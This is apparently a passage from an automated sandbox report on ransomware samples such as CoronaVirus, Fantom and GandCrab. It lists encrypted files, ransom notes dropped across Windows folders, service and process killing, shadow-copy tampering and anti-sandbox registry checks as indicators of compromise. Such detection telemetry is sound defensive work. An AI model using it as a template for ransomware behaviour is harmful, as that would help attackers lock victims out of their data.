File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\selector.js.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E InfinityCrypt.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_Trial-pl.xrm-ms CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_KMS_Client_AE-ul.xrm-ms CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG.HXS CoronaVirus.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_yuy2_plugin.dll.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\AppStore_icon.svg.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\plugin.js.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Java\jdk-1.8\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter-down_32.svg.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E InfinityCrypt.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\A12_TypeTextFields_White@1x.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\icudtl.dat.DATA.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\es\UIAutomationTypes.resources.dll CoronaVirus.exe File created C:\Program Files\Windows Media Player\en-US\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\Accessibility.dll.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\cacerts CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Client\api-ms-win-crt-filesystem-l1-1-0.dll.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File created C:\Windows\INF\LSM\0000\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.Commands.GetDiagInput.Resources\v4.0_1.0.0.0_de_31bf3856ad364e35\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\WinSxS\amd64_c_fsreplication.inf.resources_31bf3856ad364e35_10.0.19041.1_it-it_27274dc1417f2456\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\WinSxS\amd64_hyperv-vmemulateddevices.resources_31bf3856ad364e35_10.0.19041.1_en-us_7217d1309a54e027\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\WinSxS\amd64_microsoft-onecore-c..experiencehost-user_31bf3856ad364e35_10.0.19041.746_none_9afbc367b0ec146e\r\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\WinSxS\amd64_microsoft-onecore-pnp-umpnpmgr_31bf3856ad364e35_10.0.19041.3636_none_9188673a0295e1e7\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\assembly\GAC_MSIL\System.Data.Services.Client.Resources\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\assembly\GAC_MSIL\System.Web.Abstractions.Resources\3.5.0.0_es_31bf3856ad364e35\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.GroupPolicy.AdmTmplEditor.Resources\v4.0_10.0.0.0_ja_31bf3856ad364e35\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\PLA\Reports\ja-JP\Report.System.Wireless.xml Fantom.exe File created C:\Windows\SystemResources\Windows.UI.Shell\Images\PasswordExpiry.scale-125.png Fantom.exe File created C:\Windows\WinSxS\amd64_dual_acpidev.inf_31bf3856ad364e35_10.0.19041.1_none_ea8dc14f6ae3b70f\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\WinSxS\amd64_dual_acxhdaudiop.inf_31bf3856ad364e35_10.0.19041.1151_none_ee7c5953ab83c1f8\r\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SystemApps\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\Assets\Square44x44Logo.targetsize-16_altform-unplated.png Fantom.exe File created C:\Windows\WinSxS\amd64_dual_multiprt.inf_31bf3856ad364e35_10.0.19041.1_none_460ca3759be65aa8\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\WinSxS\amd64_dual_volmgr.inf_31bf3856ad364e35_10.0.19041.3636_none_c6b04320192a119f\r\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\WinSxS\amd64_microsoft-onecore-a..sibility-experience_31bf3856ad364e35_10.0.19041.746_none_69babc1ce4e23a84\ns.svg Fantom.exe File created C:\Windows\assembly\GAC_MSIL\System.Runtime.Serialization.Resources\3.0.0.0_de_b77a5c561934e089\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\Globalization\ELS\SpellDictionaries\Fluency\es-ES\ime.json Fantom.exe File opened for modification C:\Windows\Logs\DISM\dism.log Fantom.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp.resources\v4.0_4.0.0.0_es_b03f5f7f11d50a3a\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\pris\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\WinSxS\amd64_appinstallerprompt-desktop.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_4757b9e417260c6e\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\WinSxS\amd64_mausbhost.inf.resources_31bf3856ad364e35_10.0.19041.1_es-es_609df3c4290c7d0b\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.KeyDistributionService.Cmdlets.Resources\v4.0_10.0.0.0_en_31bf3856ad364e35\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Net.Http.Rtc\v4.0_4.0.0.0__b03f5f7f11d50a3a\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\es-ES\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\es-ES\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SystemResources\Windows.UI.Shell\Images\PasswordExpiry.contrast-black_scale-200.png Fantom.exe File created C:\Windows\WinSxS\amd64_dual_mdmpin.inf_31bf3856ad364e35_10.0.19041.1_none_4d18e5c6003e1566\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\WinSxS\amd64_dual_usbstor.inf_31bf3856ad364e35_10.0.19041.4355_none_b584d84a61ecaffd\f\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\WinSxS\amd64_microsoft-onecore-bluetooth-service_31bf3856ad364e35_10.0.19041.4355_none_6107756e72548b19\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\Boot\EFI\uk-UA\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Net.resources\v4.0_4.0.0.0_es_b03f5f7f11d50a3a\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Entity.resources\v4.0_4.0.0.0_fr_b77a5c561934e089\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\WindowsBase.resources\v4.0_4.0.0.0_es_31bf3856ad364e35\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\PLA\Rules\Rules.System.Finale.xml Fantom.exe File created C:\Windows\WinSxS\amd64_dual_tdibth.inf_31bf3856ad364e35_10.0.19041.4355_none_99f09dbd76358cb6\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\WinSxS\amd64_dual_uefi.inf_31bf3856ad364e35_10.0.19041.1_none_2984b96ecfbc706c\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\WinSxS\amd64_fdwnet_31bf3856ad364e35_10.0.19041.3636_none_afc043e929662f19\f\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\App_Data\GroupedProviders.xml Fantom.exe File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SQL\es\Tracking_Logic.sql Fantom.exe File created C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\images\smalllogo.png Fantom.exe File created C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\webapps\inclusiveOobe\js\oobelanguage-page.js Fantom.exe File created C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\webapps\templates\view\common-textinput-template.html Fantom.exe File created C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\Assets\SplashScreen.scale-200.png Fantom.exe File created C:\Windows\WinSxS\amd64_hyperv-compute-gues..teservice.resources_31bf3856ad364e35_10.0.19041.1_it-it_d1c18972f4a94c87\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_ja_31bf3856ad364e35\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\assembly\GAC_MSIL\System.Design.Resources\2.0.0.0_ja_b03f5f7f11d50a3a\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\diagnostics\system\Keyboard\es-ES\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\system.data.sqlxml.resources\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\SQL\it\SqlWorkflowInstanceStoreSchema.sql Fantom.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SystemApps\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\speech\040c\tokens_frFR.xml Fantom.exe File created C:\Windows\WinSxS\amd64_c_fsactivitymonitor.inf.resources_31bf3856ad364e35_10.0.19041.1_de-de_7181967e70071d31\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ScheduledJob.Resources\v4.0_3.0.0.0_fr_31bf3856ad364e35\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\AppConfig\SmtpSettings.aspx Fantom.exe File created C:\Windows\WinSxS\amd64_adp80xx.inf.resources_31bf3856ad364e35_10.0.19041.1_de-de_36953ef91b2339d8\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\WinSxS\amd64_c_fsopenfilebackup.inf.resources_31bf3856ad364e35_10.0.19041.1_en-us_2aa71f4e335f00a1\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\WinSxS\amd64_microsoft-client-licensing-licensingcsp_31bf3856ad364e35_10.0.19041.4355_none_c006c65e1356efe2\r\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\WinSxS\amd64_microsoft-onecore-r..ping-resourcemapper_31bf3856ad364e35_10.0.19041.789_none_04b460cebddd158e\r\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\WinSxS\amd64_microsoft-onecore-u..iedwritefilter-mgmt_31bf3856ad364e35_10.0.19041.1266_none_41843efc8f66bc7c\r\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\assembly\GAC_MSIL\System.Web.Entity.Design.Resources\3.5.0.0_de_b77a5c561934e089\DECRYPT_YOUR_FILES.HTML Fantom.exe -
Launches sc.exe 25 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3064 sc.exe 3112 sc.exe 1984 sc.exe 2712 sc.exe 1448 sc.exe 4428 sc.exe 4792 sc.exe 4208 sc.exe 1488 sc.exe 2332 sc.exe 2536 sc.exe 892 sc.exe 188 sc.exe 2960 sc.exe 2512 sc.exe 2000 sc.exe 4688 sc.exe 2352 sc.exe 2012 sc.exe 4688 sc.exe 3896 sc.exe 1672 sc.exe 424 sc.exe 1728 sc.exe 3684 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
Program crash 1 IoCs
pid pid_target Process procid_target 21456 1924 WerFault.exe 598 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rfusclient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NoMoreRansom.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Dharma.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winlog.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rutserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 12040 cmd.exe 12600 PING.EXE -
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 InfinityCrypt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString InfinityCrypt.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 GandCrab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString GandCrab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier GandCrab.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 winit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString winit.exe -
Delays execution with timeout.exe 7 IoCs
pid Process 3368 timeout.exe 4744 timeout.exe 4288 timeout.exe 3752 timeout.exe 2964 timeout.exe 1728 timeout.exe 3752 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 2684 ipconfig.exe -
Interacts with shadow copies 3 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 16196 vssadmin.exe 14640 vssadmin.exe -
Kills process with taskkill 7 IoCs
pid Process 4996 taskkill.exe 2032 taskkill.exe 1920 taskkill.exe 3528 taskkill.exe 3748 taskkill.exe 5044 taskkill.exe 12712 taskkill.exe -
Modifies Control Panel 6 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\Desktop Krotten.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\Desktop\WallpaperOriginX = "210" Krotten.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\Desktop\WallpaperOriginY = "187" Krotten.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\Desktop\MenuShowDelay = "9999" Krotten.exe Key created \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\International Krotten.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\International\sTimeFormat = "ÕÓÉ" Krotten.exe -
